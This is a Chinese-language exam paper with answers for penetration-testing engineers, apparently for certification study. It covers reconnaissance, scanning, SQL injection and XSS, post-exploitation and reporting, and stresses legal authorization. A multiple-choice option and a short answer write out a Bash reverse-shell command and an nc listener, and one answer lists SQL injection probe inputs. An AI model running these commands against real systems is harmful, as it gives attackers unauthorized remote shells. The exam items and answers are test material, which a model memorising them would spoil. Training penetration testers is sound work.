渗透测试工程师考试试卷及答案

渗透测试工程师考试试卷及答案填空题（每题1分，共10分）1.渗透测试信息收集阶段常用的域名查询工具是________。2.Nmap中扫描开放端口的基本命令是________（示例：nmap[参数]）。3.用于暴力破解FTP服务的工具是________。4.HTTP状态码404表示________。5.漏洞分为已知漏洞和________漏洞。6.检测Web应用XSS漏洞的工具是________。7.渗透测试基本原则包括授权、保密、________。8.TCP三次握手第一个包是________。9.Windows查看网络连接的命令是________。10.渗透测试中获取远程shell的常用方法是________。单项选择题（每题2分，共20分）1.渗透测试正确流程是？A.信息收集→权限提升→漏洞扫描→后渗透B.信息收集→漏洞扫描→权限提升→后渗透C.漏洞扫描→信息收集→权限提升→后渗透D.权限提升→信息收集→漏洞扫描→后渗透2.用于漏洞利用的工具是？A.NmapB.WiresharkC.MetasploitD.Whois3.SQL注入属于哪种漏洞？A.输入验证缺陷B.权限控制缺陷C.会话管理缺陷D.加密缺陷4.Bash反弹shell正确命令是？A.bash-i>&/dev/tcp//44440>&1B.nc-lvp4444C.pingD.netstat-an5.默认用UDP的协议是？A.HTTPB.HTTPSC.DNSD.FTP6.后渗透阶段不包括？A.维持权限B.横向移动C.漏洞扫描D.数据窃取7.OWASPTop10排名第一的漏洞是？A.注入B.XSSC.不安全设计D.权限控制不当8.用于Web代理的工具是？A.BurpSuiteB.NmapC.WiresharkD.Hydra9.Windows本地提权方法是？A.内核漏洞利用B.反弹shellC.端口扫描D.域名查询10.风险影响不包括？A.数据泄露B.系统宕机C.功能异常D.正常业务访问多项选择题（每题2分，共20分）1.信息收集方法包括？A.Whois查询B.DNS枚举C.端口扫描D.漏洞利用2.Web应用漏洞包括？A.SQL注入B.XSSC.命令注入D.缓冲区溢出3.端口扫描工具包括？A.NmapB.MasscanC.WiresharkD.Metasploit4.渗透测试原则包括？A.授权B.保密C.最小化影响D.公开结果5.后渗透任务包括？A.横向移动B.维持权限C.数据窃取D.漏洞扫描6.应用层协议包括？A.HTTPB.FTPC.TCPD.DNS7.暴力破解工具包括？A.HydraB.MedusaC.BurpSuiteD.Nmap8.漏洞风险等级包括？A.高B.中C.低D.关键9.远程代码执行（RCE）漏洞包括？A.Log4j漏洞B.命令注入C.SQL注入D.XSS10.报告组成部分包括？A.执行摘要B.漏洞详情C.修复建议D.附录判断题（每题2分，共20分）1.渗透测试不需要目标授权。（×）2.Nmap-sS是SYN半开放扫描。（√）3.XSS只能在客户端执行恶意代码。（√）4.反弹shell是攻击者主动连接目标。（×）5.漏洞利用后必须提权。（×）6.OWASPZAP是Web安全扫描工具。（√）7.TCP四次挥手用于可靠关闭连接。（√）8.修复建议不需要考虑可行性。（×）9.缓冲区溢出仅存在于Windows。（×）10.后渗透阶段无需记录日志。（×）简答题（每题5分，共20分）1.简述渗透测试基本流程。答案：流程分6阶段：①信息收集（Whois、DNS枚举、端口扫描）；②漏洞扫描（Nmap、Burp）；③漏洞利用（Metasploit获取初始权限）；④权限提升（提权为管理员/root）；⑤后渗透（横向移动、维持权限、数据窃取）；⑥报告撰写（漏洞、风险、修复建议）。全程需授权，遵守保密原则。2.什么是SQL注入？如何简单检测？答案：SQL注入是攻击者构造恶意输入，注入数据库查询执行非授权操作（数据泄露、删库）。检测方法：①输入特殊字符（'、;、--），若返回数据库错误则疑似存在；②构造布尔注入（and1=1正常，and1=2异常）；③用Burp抓包修改参数测试。需授权，避免破坏目标。3.简述反弹shell原理及作用。答案：原理是目标主动连接攻击者监听端口，传递shell会话。攻击者先监听（nc-lvp4444），目标执行反弹命令（bash-i>&/dev/tcp/IP/端口0>&1）。作用：突破防火墙（目标outbound连接常被允许），获取交互shell，便于后续操作（文件、命令执行）。4.渗透测试报告核心内容有哪些？答案：核心包括：①执行摘要（范围、主要发现、风险）；②测试范围（目标IP、端口）；③漏洞详情（编号、描述、风险、复现步骤）；④修复建议（代码修改、配置调整）；⑤附录（工具、日志、截图）。报告需客观准确，便于客户修复。讨论题（每题5分，共10分）1.讨论渗透测试中“授权”的重要性及未授权后果。答案：授权是前提，无授权属非法入侵，违反《网络安全法》。后果：①法律责任（罚款、拘留、判刑）；②道德风险（破坏系统、泄露数据）；③行业禁止（纳入黑名单）；④声誉损失（失去客户信任）。所有测试必须获得书面授权，明确范围、时间、限制。2.讨论XSS漏洞的危害及常见防御方法。答案：危害：①窃取Cookie（会话劫持）；②篡改页面（钓鱼、恶意广告）；③执行恶意代码（挖矿、远程控制）；④窃取敏感信息（密码、银行卡号）。防御方法：①输入验证（过滤<、script等）；②输出编码（HTML编码）；③HttpOnlyCookie（防窃取）；④CSP（限制资源来源）；⑤避免eval等危险函数。需前端+后端多层防护。答案汇总填空题1.Whois2.nmap-p-目标IP3.Hydra4.资源未找到5.未知（0day）6.BurpSuite（OWASPZAP）7.最小化影响8.SYN9.netstat10.反弹s